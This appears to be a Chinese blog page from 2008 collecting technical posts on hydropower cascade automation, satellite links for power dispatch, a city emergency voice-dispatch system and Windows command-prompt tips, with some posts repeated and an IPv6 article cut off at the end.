2008年8月15日星期五
大川河梯级水电站及梯调中心自动化监控系统
摘 要:本文简要介绍了大川河梯级水电站及梯调中心自动化监控系统的设计原则、系统结构及主要功能,并就存在的问题提出一些看法供大家探讨。 关键词:大川河梯级水电站 梯调中心 计算机监控系统 结构 功能 问题 1.概况 大川河梯级水电站位于四川省芦山县大川镇境内,其下属三个引水式小型水电站(中咀电站、长石坝电站、佛山电站)和一个梯级调度中心,共6台机组,总装机容量70MW。其中中咀电站装机2×14MW,长石坝电站2×10MW,佛山电站2×11MW,梯级电站通过2回110kV出线将电力送至成都电业局大邑供电局官渡变电站与系统连接。电站距芦山县城约74km,距成都市149km,对外交通较为便利。 大川河梯级水电站自动化监控系统采用南瑞自控公司的NAS-900全分布开放式综合自动化监控系统。按照大川河梯级水电站综合自动化采用全计算机监控的方式,电站能实现现地、站级和设在长石坝电站的大川河梯级调度中心控制及省调调度。2.设计原则 大川河梯级水电站及梯调中心自动化监控系统是按照“无人值班(少人值守)”的原则进行总体设计和系统配置,采用全微机控制,最新的计算机软件、硬件及网络技术。该系统与电站安全运行密切相关的设备均双重化设置或采用冗余技术,采用全分布开放式系统结构,满足业主要求的可靠、安全、经济、实用、技术先进 和便于扩充等基本原则。 系统配置和设备选型适应了计算机技术高速发展的特点,硬件、软件均采用模块化、结构化的设计,便于硬件设备的扩充,又可以适应功能的增加和系统规模的扩展。实时性好,系统维护性好。在三个电站和梯调中心计算机之间进行通讯实现遥信、遥测、遥控和遥调功能。系统采用IEEE802.3以太网结构使系统具有较好的开放性,可以手动优先、下层优先的方式或其他用户指定的方式设置必要的硬件和软件,使运行操作人员能方便在各控制层之间、计算机控制与简化常规控制设备之间选定对设备的控制权,对无控制权的控制设备进行闭锁。 系统采用了PLC直接接入总线,此方式大大提高了网络的可靠性,避免了PLC通过一体化机接入以太网的瓶颈,使各个设备具有安全的独立性。主控层以太网采用当今最流行的光纤以太网方式及载波备用通道,实现通信通道的热备用冗余,突出了系统的高可靠性。3.系统结构 大川河梯级水电站及梯调中心自动化监控系统采用符合国际开放系统标准的开放式环境下的全分布计算机监控系统,在功能上系统分为三级,即调度控制级、主控级和单元控制级。3.1梯级调度中心 大川河梯级调度中心总的监控系统网络主要由梯调中心和中咀电站、长石坝电站、佛山电站组成,网络采用星形以太网结构。梯调中心与各电站通过一条单模光纤和一条载波通道通信,正常情况梯调中心通过光纤与三个电站进行信息交换,网络传输速率大于或等于100Mbps,传输速率为自适应式,采用TCP/IP协议,遵循IEEE802.3标准。当光纤网络故障时启动载波通道进行数据通信。 大川河梯级调度中心的主要功能是对三个电站进行集中控制与监视,实现梯调中心与各个电站的数据通信。配置2台主控工作站及1台通信管理机,1台工程师工作站,1组模拟返回屏,1台24口以太网交换机,2台打印机,2台冗余配置的容量为3KVA的UPS。●调度集控工作站在梯调中心设置2台冗余配置的主机/操作员工作站,并采用主/从热备用工作方式,其中1台为主控机负责各电站的数据采集、控制功能的实现,主要完成各梯级电站的运行自动化及其管理,包括整个梯级电站的联合经济运行控制、历史数据存档、归类、检索和管理,运行报表生成与打印,人机接口功能等,即完成设备运行的实时监视与控制。另1台(备份机)作为系统管理机负责监视网上各台机的运行情况,备份主控机的数据库,并在检测到主控机故障时立即担当起主控机的所有功能并报警。●通信管理机 用于与各电站通信机进行数据通信,通信方式为光纤以太网及备用的载波通道。同时通信管理机还用于与上级电力调度进行远动通信,具有远程数据功能。●工程师工作站 梯级调度中心作为梯级调度的管理中心需要对各电站的监控软件进行维护和参数设定,设置1台工程师工作站作为系统的维护工作站。●返回模拟屏 用于显示电站主接线图全貌及设备状态、主要电气参数、时钟等。模拟返回屏驱动由通信管理机通信方式实现数据通信。●网络通信设备 大川河梯级水电站监控系统采用光纤以太网络技术与在线运行的各计算机和各现地控制单元进行通信,接口符合IEEE802.3标准,另外为了保证系统通信的通道冗余,采用载波通信MODEM与各电站进行通信。●打印机 计算机监控系统设有2台打印机,一台用于打印报表,另一台用于报警连续纸打印。●不间断电源UPS 系统设置2台冗余配置的UPS,容量为3KVA。3.2电站控制级 中咀、长石坝、佛山电站的电站控制级均按统一的方案进行配置。主控级由2套主机/操作员工作站、1台通信管理机,1台24口以太网交换机、2台打印机、2台冗余配置的容量为3KVA的UPS组成。是电站的实时监控中心,实现对全厂的自动化功能、历史数据处理及全厂的人机对话等功能。● 主控站工控机 在中咀、长石坝、佛山电站中控室各设置2套冗余配置的主机/操作员工作站,并采用主/从热备用工作方式,一台作为主控机负责采集、控制功能的实现,主要完成全厂的运行自动化及其管理。另一台(备份机)作为系统管理机负责监视网上各台机的运行情况,备份主控机的数据库,并在检测到主控机故障时担负起主控机的所有功能并报警。● 通信管理机 用于与梯调中心远动通信,具有远程数据功能,同时通信工作站还预留与电站水情测报系统及大坝监测系统通信的接口。● 卫星时钟GPS 用于与各工控机、现地控制单元LCU通讯对时。● 网络通信设备 用于与在线运行的各计算机和各现地控制单元进行通信。● 打印机计算机监控系统设有2台打印机,一台用于打印报表,另一台用于报警连续纸打印。● 不见断电源UPS 系统设置2台冗余配置的UPS,容量为3KVA。3.3单元控制级 单元控制级按被控对象性质分为机组控制单元LCU、开关站及公用设备控制单元LCU。 长石坝、佛山电站分别设置4个现地控制单元,即2台机组控制单元LCU,开关站及公用设备现地控制单元LCU,闸门现地控制单元LCU。 中咀电站设置5个现地控制单元,即2台机组控制单元LCU,1台开关站及公用设备现地控制单元LCU,2台闸门现地控制单元LCU。 各现地控制单元采用PLC直接接入以太网的方式与主控站连接,使得通信可靠性和通信速率都得到有效提高。● 机组LCU LCU设置在机旁,实现对各生产设备的数据采集和处理、安全运行和监视、控制调节、事件顺序检测和发送、数据通信、系统诊断等功能。● 开关站LCU 开关站及公用设备LCU主要对110KV、35KV出线、主变压器及厂用变压器、全厂公用油、气、水辅助系统厂用电系统、直流系统等进行数据采集和处理。● 闸门LCU 各个电站均设有取水口闸门,由于每个电站的取水口均距电站中控室约5~10km,故采用单模光纤接入相应的电站主控层网络,但由于中咀电站闸门LCU4、5至中咀控制室具备电话线通道,现可采用带MODEM接入电站通信管理机的方式进行通信。4.系统功能4.1对各主要机电设备运行参数得监视和记录 系统对各主要设备得工况参数进行巡回检测、定时打印、越限报警、复限时发信号并显示记录,同时对系统内部信息进行相关分析,求出信息之间的相关度,构造新的二次信息作为主信息判断的辅助信息,防止单一信息可信度差异所造成得决策失误。4.2控制和调节 监控系统根据预定的原则和运行人员输入(或来自梯调中心发来的)命令,发出开停机命令,进行各断路器、隔离开关分合闸操作,以及和机组运行有关的闸门的操作。系统对操作过程进行校核和监视,并进行操作记录。可用增减命令或改变设定值方式调节机组出力。LCU可接收主计算机、操作员工作站或现地输入的命令,能自动完成开、停机操作和有功、无功功率的调节而不需依赖电站控制中心。在接收电站控制中心命令后,工况转换及调节能自动完成,也能分步完成,机组LCU也能执行现地人机接口发出的现场命令。监控系统软件可以实现控制设备的防误闭锁操作。4.3有功功率联合控制 监控系统可根据中调提供的负荷曲线或实时给定值,或值班操作人员即时给定的有功功率值,以及各机组的效率特性曲线、电站即时的运行工况并考虑机组振动、气蚀等约束条件,计算在机组负荷变化后的水头下电站的机组最优开机组合,并按照等微增率。动态规划或用户要求的其他方式计算机组间最优负荷分配。电力系统频率过低时可按照低频启动准则,自动启动备用机组。 自动发电控制还可接收厂内高频切机、系统振荡压负荷等电力系统自动装置或功能模块发出的控制信号按给定顺序完成停机、开机或压负荷的自动操作。 自动发电控制可完成各台机组运行工况转换时的协调工作,保证机组和电力系统所受的干扰最少。4.4无功功率联合控制 按给定时段的高压母线电压值,定时计算,自动调节和分配各机组无功功率,自动维持高压母线和无功负荷的合理分配。 自动电压控制功能能按照电力系统要求,维持母线电压在规定的范围内,在此基础上实现各台机组间无功功率按等功率因数分配,进相运行时,可在校验发电机静态稳定、定子端部发热程度以及厂用母线电压水平的基础上,合理分配每台机组的无功功率。4.5经济调度 能实现在线经济调度。在进行遥调时应根据各电站的情况综合安排,计算各电站机组群的优化组合,以保证联合运行的总出力经济合理。根据水库进水量计算、水耗计算、综合利用效率计算,并进行水文、水情、气象资料预测处理,使水库运行优化合理。4.6数据通信 通过一路光纤以太网通道,一路载波通道,与梯调中心的计算机系统通讯,电站计算机监控系统上送遥测、遥信信息,接收电网的遥调、遥控命令。实现对各LCU、微机保护、调速器、励磁调节器等自动装置、工业电视系统、消防系统、厂长终端接口等系统的通信。4.7运行管理指导 自动统计主要设备的运行小时数、动作次数、事故和故障次数等数据,建立设备运行档案,为合理安排设备的运行和维护提供依据。根据监控系统所储存信息以及实时采集的信息,正常操作或发生事故时,能自动或由运行人员召唤提出操作指导意见。4.8统计和制表打印4.9故障自诊断和自恢复功能 大川河梯级水电站及梯级调度中心计算机监控系统的硬件、软件工作进行监视和保护的功能,能及时测出故障部位,切除故障模块并在人机街面上给出指示,便于运行人员迅速更换并恢复系统,监控系统每一级都具备自恢复功能,即当监控系统出现程序死锁或失控时,能自动恢复到原来状态。监控系统还可以在线运行诊断软件,当发生程序死锁或失控时,能自动启动冗余系统或发出冗余切换请求,并具备自恢复功能。4.10其他辅助功能 监控系统允许通过程序开发终端或工程师工作站,借助于本系统,进行功能再开发、增修画面等工作,而不影响在线主机运行。5.软件系统 系统在硬件选择上以系统的开放性和兼容性为指导思想,具有很大的灵活性,支持异型机联网。软件方面主机、工作站及各LCU均使用WINDOWS操作系统,操作系统具有良好开放性、实时性、可移植性、高可靠性,采用C++编程,面向对象设计、具有友好的人机界面,注重系统的可维护性,并提供了系统维护工具。随系统提供的基本软件包括自动发电控制(AGC)和自动电压控制(AVC)软件、实时执行软件(NAS-901软件包)、编程语言(VISUAL C++等)、自诊断软件(NAS-901诊断包)、数据库管理软件(SQL SERVER)、通信管理软件(NAS-901通信软件包)、经济调度软件(NAS-901高级应用程序)、工具软件(交互式图形、报表、数据库生成软件)。系统的上位机部分包含数据管理、实时控制、系统维护、通讯服务等功能,电站运行人员、工程师可通过各自的工作站完成画面制作、画面显示、打印报表、参数设置和操作控制等功能。6.存在的问题和建议 目前中咀电站2台机组及长石坝梯级调度中心的监控系统已经全部投运8个多月,长石坝电站、佛山电站也即将投入运行。笔者有幸参加了大川河梯级水电站及梯调中心监控系统的部分安装调试工作,现就安装调试和运行中出线的一些问题在此提出以下看法:6.1 公用LCU虽然采用交、直流同时供电方式,AC220V取自厂用电系统,DC220V取自直流系统。虽然交直流电源同时消失的几率是很小的,但是这种情况一旦出现整个公用LCU装置将陷于瘫痪,所以建议公用LCU装置电源再从调度中心模拟屏的UPS电源取一回,增加其高可靠性。6.2 机组LCU采用的单元测控装置对遥测量的采集速度较慢,信息不稳定,使得1F机组转子电流、2F机组定子电流、定子电压、频率等模拟量时有时无。建议在后续的改造中监控系统遥测量采集采用性能更为优异的测控装置。6.3 如1F机组停机过程中制动闸不能自动投入,1F机组在上位机及前置机上只能向上加负荷而不能减有功负荷的问题还有待于同监控系统厂家技术人员进行深入的探讨后再行解决。在此提出,希望引起大家重视!7.结语 通过中咀电站大半年的运行情况来看,大川河梯级水电站监控系统总体上运行稳定,可靠性高,操作方便,人机界面友好,维护量小,未发生影响机组运行的故障或事故。虽然该监控系统在运行中出现了一些不如人意的地方,但这些问题必将在后续梯级电站投运前得到不断完善,为大川河水力发电厂及其调度中心早日实现“无人值班,少人值守”创造更为有利的条件。
利用卫星通信实现电力调度自动化传输
摘要:本文介绍一种实现电力远程调度自动化的新通讯方案——卫星通信,着重阐述了卫星通信的特点、优势及选型,并以成功案例推荐一种经济适用的农网自动化通道产品——超小型SSA卫星系统。 1、卫星通信的特点、优势及选型 在一些地方,变电所分散,地形复杂,高山河流较多。选择适当的技术,做到高效可靠、节省投资,是摆在电力部门面前的一个重要问题。我们在昆明市电力局通信网的建设中,采用组建卫星通信网的方式,取得良好的效果。 电力系统的传统通信方式一般是以电力线载波、超微波和模拟微波系统为主。在这些技术中,电力线载波由于传输距离短、不能跨越变压器、传输速率低和可靠性差等诸多不利因素,目前在电力系统中的应用已逐渐减少。超微波数据传输方式由于电磁环境日趋恶劣和申请频道方面的困难,从而难以推广。模拟微波也存在费用高、通信质量差、受气候影响较大等问题。 近年来,数字微波和光纤通信也逐步应用于电力系统,但是,由于采用上述技术的设备成本较大,所以比较适合电力通信网的骨干网,而对于大量分散、数据通信业务量较小的变电所就不合适了。此外,还有一种微波一点多址系统技术,它具有组网灵活、通过中继可实现超视距离通信、设备初期投资较少等特点。但是目前微波一点多址设备工作在2.4GHz的频段,地面干扰比较严重,当通信距离超过视距或存在阻挡时,需要一次或多次中继,中继设备的成本较高,这样不适合处于山区或比较分散的用户。 VSAT(Very Small Aperture Terminal,甚小口径卫星终端)是一种先进的卫星通信技术,和其他通信技术相比,不但具有不受距离和地理环境限制、通信容量大和可提供多种综合业务传输等特点,而且投资少,建设周期短,成为边远地区通信的首选方式之一。 实践证明,采用超小型卫星站组建远动通信链路或者双通道中的无线链路是比较好的选择,对旧网点通信链路进行改进及完善也是可行的。 2、电力调度的需求分析 2.1用户数据业务分析 双向数据业务为供电局中调卫星专用网的主要任务,其特点如下: (1)中低速率。按照用户的需求为300~1200bps。 (2)连续传输。电调中心卫星专用网的交互数据需每天24小时不间断传输。 (3)以地区或县调为中心呈星型拓朴结构,中心控制要求多条实时链路共享,中心卫星站应具备可接入多路双向实时链路的能力。远端站的遥测数据向电调中心传输,电调中心可对远端变电所进行实时指令控制。 (4)远动指令传送及返叫的时延应满足厂家及规约要求。 2.2话音业务分析 话音业务是供电局调度卫星专用网的一个辅助业务。由于生产方面需要,远端变电所与地区电调中心需进行话音联系,卫星通信终端在提供数据通道的同时,应为用户提供1~2路话音服务,可满足远端变电所直接与中心调度所间的通话。话音业务要求可接入用户交换机,今后具有根据用户需求可扩容的能力。 3、实用方案设计 各个调度部门可根据自身要求做网络大小配置,但总体框架及单元站配置是一样的,中心调度部门做地区卫星数据中心站,连接辖区内各远端监控点(变电所)的卫星站,构成星状网络,中心卫星站设备一次建设,初期远端可是一个点或少数点与中心进行通信;将来进一步扩容时,只需增加远端站的个数,无须改造中心站。 3.1卫星网络设备配置 (1)供电局调度中心架设一套SSA超小型卫星地面站,并配置多端口接入设备一个,端口数由远端站的个数而定(可为8~32个); (2)在远端每个变电所架设一套SSA超小型卫星地面站,并配置两端口通道接入设备(通道控制器); (3)每套标准SSA超小型卫星站含:1.2m天线一副,室外功放一套,室内单元(IDU)一台(包括数据接口,以太网接口及话音接口); 3.2卫星网络配置说明 按上述方案配置组建卫星网络,电调中心SSA卫星地面站的链路可支持多个远端变电所(至多达30路以上)。电调中心接入设备的各端口与远端变电所的通道控制器端口做一对一的通信。 通道控制器是根据电力远动要求及超小型卫星设备特点,专门针对电力远动自动化设备接口开发的产品,可将传统卫星链路在传送远动控制指令时出现的较大时延大幅减少(可减少50%以上),同时不影响卫星链路效率。 如使用第二代SSA超小型卫星站在接口配置上更加灵活,可根据用户需求在每一小站上插入一到两块话音卡,以实现多路话音通讯。 3.3 SSA卫星链路实现的功能 (1)由超小型SSA卫星链路将变电所与电调中心的监控系统连接起来,实现变电所与电调中心站的实时性数据通信。 (2)SSA卫星链路可实现全双工通信,电调中心对变电所直接进行指令控制,电调中心站端可同时支持多个端口。 (3)超小型SSA卫星地面站提供1~2路话音服务,可实现变电所与电调中心站间的直接通话。 3.4 网络配置结构如图1。 4、SSA卫星系统的特性 第二代SSA超小型卫星站是专门为经济型用户普及使用卫星通讯开发的综合业务用户系统,完全改变了传统卫星通讯价格昂贵技术复杂的特点,可为非专业用户便利地实现专业级卫星通信,尤其对电力调度通道的使用,更以目前最新科技提供多项技术优势: (1)用户中心多信道控制能力,用户中心可实现一套卫星站同时联结30个以上远动控制点的卫星站,真正实现多点实时双向卫星信道服务,接续能力比同等价值其它卫星设备提高10倍以上。 (2)用户中心吞吐能力大为提高,可为用户提供高达64K的通讯链路,真正解决了电力用户中调卫星站的瓶颈问题。 (3)具有更灵活的接口及扩容能力,具有3个插槽式硬件扩展接口可灵活扩充数据和话音接口及软件升级速率(可升级到2M速率)。 (4)可联接通道控制器,将传统卫星链路在传送远动控制指令时出现的较大时延大幅减少(可减少50%以上),并使卫星通道实现自动控制及复位(无需人工网管干予),可完全满足无人值守变电所的要求。 (5)可节省空间资源,使用户通讯费降至最低。 目前,SSA卫星系统已在全国数十个电力调度部门的无人值守变电所上做为主通道或备用通道为电调自动化服务。 5、结论 综上所述,卫星通讯作为不受地域环境限制的新型通信手段,在电力调度通道选择上具有其独特的优势,尤其是经济型系统SSA卫星站,将在实现综合自动化方面发挥重要作用。
城市应急指挥调度应用方案
为了更好的保障人民群众的健康与生命安全,实现现代化城市管理,各级政府都在努力建设城市应急系统。该系统主要将政府的各相关部门紧密连接起来,对于城市特殊、突发、紧急事件向公众提供社会紧急救助服务。
Zed-3推出的城市应急指挥调度系统,以语音调度为主,实现跨地区、跨部门、跨警区以及不同警种之间的统一指挥协调;快速反应、统一应急、联合行动,真正实现社会服务的联动,有效应对突发性公共事件;为城市构建一张全面的应急预警和处理“安全网”,完善市各级政府对突发公共紧急事件(如:流行病、恶性案件、灾害事故)应急反应机制。
方案介绍
在中心机房放置MDS调度系统,负责语音的处理与调度;在应急指挥中心安装专用调度台,运行调度客户端控制软件,用于监控各政府部门的通话状态并开展调度工作;各级政府部门和相关单位,安装专用调度电话或其他语音调度终端,组成完整的语音调度系统。
在实际应用时,如遇突发情况,应急调度指挥中心可以通过调度客户端控制软件,对所有单位和部门发起广播通知、召开紧急会议、下达调度命令。调度话机支持自动应答功能,能够很好的配合紧急命令的下达。当急需与某单位联系,但该单位正处于通话状态时,可以通过强插、强拆等调度功能强行加入或切断通话;并且可以通过监听功能随时了解基层单位的工作进展,而又不打扰他们。
基于目前成熟的无线通信技术,可以将无线调度终端或话机安装在应急指挥车或抢修车上,保证了紧急情况下的不间断通讯。同样还可提供基于PDA或其他无线终端的调度客户端软件,可以在移动中开展调度指挥工作。
该方案具有以下特点:
借助互联网或政府专网,能够在短时间内为各政府部门部署应急调度系统;
该指挥调度系统基于IP网络,能够兼容多种形式的路由备份,例如各种网络连接的物理形式,光纤、MODEM拨号、无线、卫星等等,利于在发生特殊情况时保障线路畅通;
结合广播、会议、强插、强拆等调度功能,在紧急时刻争分夺秒,保障迅速的信息上报和任务下达。
Zed-3推出的城市应急指挥调度系统,以语音调度为主,实现跨地区、跨部门、跨警区以及不同警种之间的统一指挥协调;快速反应、统一应急、联合行动,真正实现社会服务的联动,有效应对突发性公共事件;为城市构建一张全面的应急预警和处理“安全网”,完善市各级政府对突发公共紧急事件(如:流行病、恶性案件、灾害事故)应急反应机制。
方案介绍
在中心机房放置MDS调度系统,负责语音的处理与调度;在应急指挥中心安装专用调度台,运行调度客户端控制软件,用于监控各政府部门的通话状态并开展调度工作;各级政府部门和相关单位,安装专用调度电话或其他语音调度终端,组成完整的语音调度系统。
在实际应用时,如遇突发情况,应急调度指挥中心可以通过调度客户端控制软件,对所有单位和部门发起广播通知、召开紧急会议、下达调度命令。调度话机支持自动应答功能,能够很好的配合紧急命令的下达。当急需与某单位联系,但该单位正处于通话状态时,可以通过强插、强拆等调度功能强行加入或切断通话;并且可以通过监听功能随时了解基层单位的工作进展,而又不打扰他们。
基于目前成熟的无线通信技术,可以将无线调度终端或话机安装在应急指挥车或抢修车上,保证了紧急情况下的不间断通讯。同样还可提供基于PDA或其他无线终端的调度客户端软件,可以在移动中开展调度指挥工作。
该方案具有以下特点:
借助互联网或政府专网,能够在短时间内为各政府部门部署应急调度系统;
该指挥调度系统基于IP网络,能够兼容多种形式的路由备份,例如各种网络连接的物理形式,光纤、MODEM拨号、无线、卫星等等,利于在发生特殊情况时保障线路畅通;
结合广播、会议、强插、强拆等调度功能,在紧急时刻争分夺秒,保障迅速的信息上报和任务下达。
2008年8月8日星期五
Windows系统命令提示符八大特别技巧
相信大部分人已经熟悉了微软的Windows操作界面,然而并不是所有的功能都必须借助它才能实现, 因此即便在Windows 2000与Windows XP里仍然保留了类似DOS的命令窗,当然它们与以往Windows 9x版本下的命令窗口有许多不同,因而也有许多特别的应用技巧,我们不妨一同来看一看。
点击“开始→程序→附件→命令提示符”或“开始→运行”,再输入“CMD”进入命令即可提示符状态。
1、巧用自动记忆功能
命令窗具有命令记忆功能,您在窗口中输入的所有命令行都会被自动记忆下来,通过点击键盘上的上下方向键就可以把刚输入的命令逐一调取出来,类似于DOS中的DOSKEY指令,只不过它把这条指令内置于命令窗口中了。这种记忆功能可以免除您反复输入相同指令的痛苦,对于网络环境的调试尤其有用,可以为您节省大量重复劳动和宝贵时间。
2、趣味提示符
你会想象到让你的命令提示符变成当前时间吗?能显示当前Windows XP版本号吗?只要你想就能实现。下面我们就来教大家怎么实现。
在这里我们借助的是一个prompt的DOS命令,该命令有很多实用的参数,详细参数作用请读者在提示符状态运行prompt/?来查阅。了解了这些参数的作用之后,就可以在安装路径下建立一文件,将其命名为run.bat,该文件夹中的内容为prompt $V$D$G$G。接下来打开注册表编辑器,依次浏览到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\,然后双击右侧的AutoRun键值,将其修改为%systemroot%\run.bat,保存设置退出。重新打开命令提示符,怎么样是不是有了变化。其实只要你根据prompt的参数就可以自行定义非常丰富的提示符文字。
3、复制窗口内容
字符串的拷贝对于命令窗来讲相当有用。但Windows 2000与Windows XP的命令提示符的拷贝方式与以前版本有较大差异,即使二者之间也并不相同,前者是采用标记复制法,而后者则直接采用鼠标右键点击的复制法。具体描述如下:
在Windows XP里,对于全部内容,您可以直接点击鼠标右键中的“全选”来选定,而对于指定范围的内容,您可以首先点鼠标右键选其中的“标记”项,而后移动鼠标到待复制的命令字符处,拖动鼠标选择该字符串,这些字符串将立刻以反白形式出现在屏幕上,点击鼠标右键或按回车键,再移动到目标位置,右击并选择“粘贴”,这样一个命令字符串就自动拷贝到了指定的位置上。
在Windows 2000下,由于在命令窗中不支持鼠标右键的菜单(但支持鼠标的拖动选择),因此它给出了一种更为简洁的方式用天命令字符的复制,首先您必须按住鼠标左键,拖选待复制的命令字符串,它们将以反白形式出现在屏幕上,先点击一下鼠标的右键(即执行复制操作),将鼠标移到目标位置,然后再次轻点鼠标左键,命令字符就自动粘贴到新的位置上了!
4、改变窗口特性
如果您长期在命令提示符下工作还可以自行调节其外观以适应自己的使用习惯,比如对其窗口的标题,颜色等进行个性化设置,经常使用到的相关命令如下:
a)改变标题:CMD /k TITLE新标题名
b)改变命令符:CMD /K PROMPT [text](text为新的命令提示符)
c)改变前景色和背景色:CMD /t:gf(g是指定背景色的十六进制数字,常用的颜色有以下值:0 黑色,1蓝色,2 绿色,3 浅绿色,4红色,5紫色,6黄色,7白色,8灰色,9浅蓝,A浅绿,B浅蓝色,C浅红色,D浅紫色,E浅黄色,F亮白色。
5、命令窗的快捷键
在命令窗下有许多好用的快捷键,可以大大加快您的输入和调试速度,而且一些功能还以图形方式提供。
ESC:清除当前命令行;
F7:显示命令历史记录,以图形列表窗的形式给出所有曾经输入的命令,并可用上下箭头键选择再次执行该命令。
F8:搜索命令的历史记录,循环显示所有曾经输入的命令,直到按下回车键为止; F9:按编号选择命令,以图形对话框方式要求您输入命令所对应的编号(从0开始),并将该命令显示在屏幕上;
Ctrl+H:删除光标左边的一个字符;
Ctrl+C Ctrl+Break,强行中止命令执行;
Ctrl+M:表示回车确认键;
Alt+F7:清除所有曾经输入的命令历史记录;
Alt+PrintScreen:截取屏幕上当前命令窗里的内容。
6、好“色”的命令行
在默认状态下命令行永远是黑底白字,就从这里先开刀。在运行对话框中输入cmd,打开命令提示符,在打开的窗口的标题上右击,在弹出的菜单中选择“属性”,并将打开的窗口切换到“颜色”选项卡,依次选中屏幕文字、屏幕背景选项,并设置相应的颜色,注意当我们更改了设置之后在下方就会实时显示出来,根据这一点我们可以根据自己的喜欢及时作出调整,做好之后保存设置会询问应用属性,选择“保存属性,供以后具有相同标题的窗口使用”,这样就不至于只对当前窗口生效了。
7、快速选择文件和文件夹
在命令提示符状态下,我们可以按下Tab键来选择当前目录下面的文件和文件夹,它的选择是按照一定顺序来进行的,按下Shift+Tab组合键还可以进行反方向选择,非常方便。注意,此时我们所选择的文件还包括隐藏文件在内。
8、保存文件列表信息
有时候我们需要把硬盘中某目录下的文件列表信息全部打印出来,此时可以采用下面的办法:键入命令DIR>C:\1.TXT之后回车,这样当前目录的文件列表就会保存到C盘的1.txt文件中
点击“开始→程序→附件→命令提示符”或“开始→运行”,再输入“CMD”进入命令即可提示符状态。
1、巧用自动记忆功能
命令窗具有命令记忆功能,您在窗口中输入的所有命令行都会被自动记忆下来,通过点击键盘上的上下方向键就可以把刚输入的命令逐一调取出来,类似于DOS中的DOSKEY指令,只不过它把这条指令内置于命令窗口中了。这种记忆功能可以免除您反复输入相同指令的痛苦,对于网络环境的调试尤其有用,可以为您节省大量重复劳动和宝贵时间。
2、趣味提示符
你会想象到让你的命令提示符变成当前时间吗?能显示当前Windows XP版本号吗?只要你想就能实现。下面我们就来教大家怎么实现。
在这里我们借助的是一个prompt的DOS命令,该命令有很多实用的参数,详细参数作用请读者在提示符状态运行prompt/?来查阅。了解了这些参数的作用之后,就可以在安装路径下建立一文件,将其命名为run.bat,该文件夹中的内容为prompt $V$D$G$G。接下来打开注册表编辑器,依次浏览到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\,然后双击右侧的AutoRun键值,将其修改为%systemroot%\run.bat,保存设置退出。重新打开命令提示符,怎么样是不是有了变化。其实只要你根据prompt的参数就可以自行定义非常丰富的提示符文字。
3、复制窗口内容
字符串的拷贝对于命令窗来讲相当有用。但Windows 2000与Windows XP的命令提示符的拷贝方式与以前版本有较大差异,即使二者之间也并不相同,前者是采用标记复制法,而后者则直接采用鼠标右键点击的复制法。具体描述如下:
在Windows XP里,对于全部内容,您可以直接点击鼠标右键中的“全选”来选定,而对于指定范围的内容,您可以首先点鼠标右键选其中的“标记”项,而后移动鼠标到待复制的命令字符处,拖动鼠标选择该字符串,这些字符串将立刻以反白形式出现在屏幕上,点击鼠标右键或按回车键,再移动到目标位置,右击并选择“粘贴”,这样一个命令字符串就自动拷贝到了指定的位置上。
在Windows 2000下,由于在命令窗中不支持鼠标右键的菜单(但支持鼠标的拖动选择),因此它给出了一种更为简洁的方式用天命令字符的复制,首先您必须按住鼠标左键,拖选待复制的命令字符串,它们将以反白形式出现在屏幕上,先点击一下鼠标的右键(即执行复制操作),将鼠标移到目标位置,然后再次轻点鼠标左键,命令字符就自动粘贴到新的位置上了!
4、改变窗口特性
如果您长期在命令提示符下工作还可以自行调节其外观以适应自己的使用习惯,比如对其窗口的标题,颜色等进行个性化设置,经常使用到的相关命令如下:
a)改变标题:CMD /k TITLE新标题名
b)改变命令符:CMD /K PROMPT [text](text为新的命令提示符)
c)改变前景色和背景色:CMD /t:gf(g是指定背景色的十六进制数字,常用的颜色有以下值:0 黑色,1蓝色,2 绿色,3 浅绿色,4红色,5紫色,6黄色,7白色,8灰色,9浅蓝,A浅绿,B浅蓝色,C浅红色,D浅紫色,E浅黄色,F亮白色。
5、命令窗的快捷键
在命令窗下有许多好用的快捷键,可以大大加快您的输入和调试速度,而且一些功能还以图形方式提供。
ESC:清除当前命令行;
F7:显示命令历史记录,以图形列表窗的形式给出所有曾经输入的命令,并可用上下箭头键选择再次执行该命令。
F8:搜索命令的历史记录,循环显示所有曾经输入的命令,直到按下回车键为止; F9:按编号选择命令,以图形对话框方式要求您输入命令所对应的编号(从0开始),并将该命令显示在屏幕上;
Ctrl+H:删除光标左边的一个字符;
Ctrl+C Ctrl+Break,强行中止命令执行;
Ctrl+M:表示回车确认键;
Alt+F7:清除所有曾经输入的命令历史记录;
Alt+PrintScreen:截取屏幕上当前命令窗里的内容。
6、好“色”的命令行
在默认状态下命令行永远是黑底白字,就从这里先开刀。在运行对话框中输入cmd,打开命令提示符,在打开的窗口的标题上右击,在弹出的菜单中选择“属性”,并将打开的窗口切换到“颜色”选项卡,依次选中屏幕文字、屏幕背景选项,并设置相应的颜色,注意当我们更改了设置之后在下方就会实时显示出来,根据这一点我们可以根据自己的喜欢及时作出调整,做好之后保存设置会询问应用属性,选择“保存属性,供以后具有相同标题的窗口使用”,这样就不至于只对当前窗口生效了。
7、快速选择文件和文件夹
在命令提示符状态下,我们可以按下Tab键来选择当前目录下面的文件和文件夹,它的选择是按照一定顺序来进行的,按下Shift+Tab组合键还可以进行反方向选择,非常方便。注意,此时我们所选择的文件还包括隐藏文件在内。
8、保存文件列表信息
有时候我们需要把硬盘中某目录下的文件列表信息全部打印出来,此时可以采用下面的办法:键入命令DIR>C:\1.TXT之后回车,这样当前目录的文件列表就会保存到C盘的1.txt文件中
运用Windows工具获取IPv6配置信息
本文介绍如何使用命令行工具,获取运行 Microsoft Windows XP Service Pack 2 (SP2)、Windows Server 2003、Windows Vista或 Windows Server 2008的计算机的 IPv6 配置详情。
介绍 IPv6 配置
IPv6 配置主要由以下几个部分组成:
•分配给每个接口的 IPv6 地址
•默认路由器(IPv4 中称为默认网关)
•域名系统 (DNS) 设置(比如:DNS 服务器和名称注册行为)
不同于典型的 IPv4 节点,典型的 IPv6 节点拥有多个接口(LAN 和隧道接口)以及分配给每个接口的多个地址。
注意:IPv6 并不使用网络基本输入/输出系统 (NetBIOS)。所以,IPv6 配置不需要 NetBIOS 设置或 Windows Internet Name Service (WINS) 服务器的地址。
IPv6 地址
IPv6 中的地址配置比 IPv4 更加复杂,因为存在着不同类型的 IPv6 地址,并且这些地址可以不同的状态存在。
不同类型的 IPv6 地址
对 IPv6 定义的地址类型如下:
•全局地址 类似公共 IPv4 地址,IPv6 全局地址在 Internet 的 IPv6 部分中全局可访问。全局 IPv6 地址通常以“2”或“3”开头。
